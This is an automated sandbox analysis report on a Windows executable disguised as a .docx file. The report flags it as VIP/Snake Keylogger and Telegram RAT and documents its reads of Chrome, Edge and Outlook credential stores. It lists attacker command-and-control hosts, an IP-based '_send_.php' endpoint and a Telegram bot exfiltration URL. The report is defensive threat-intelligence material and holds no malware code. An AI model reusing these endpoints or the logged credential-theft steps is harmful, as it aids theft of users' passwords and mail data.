Source: Yara match	File source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	13 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	13 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	31%	Virustotal		Browse
HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	29%	ReversingLabs
HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	100%	Avira	HEUR/AGEN.1362915
HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2018/12/2024%20/%2006:26:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.fontbureau.com/designersG	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003370000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.tiro.com	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004403000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AD000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000425F000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004527000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004451000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003344000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004502000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000440B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004267000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AF000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000423A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000333F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1729417735.0000000002971000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031D0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003375000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003366000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004403000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AD000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000425F000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004527000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004451000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.carterandcone.coml	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003240000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003240000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031D0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004502000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000440B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004267000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AF000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000423A000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576530
Start date and time:	2024-12-17 08:32:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/3@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 247 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:33:07	API Interceptor	11048070x Sleep call for process: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Order129845.exe	Get hash	malicious	AgentTesla	Browse
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
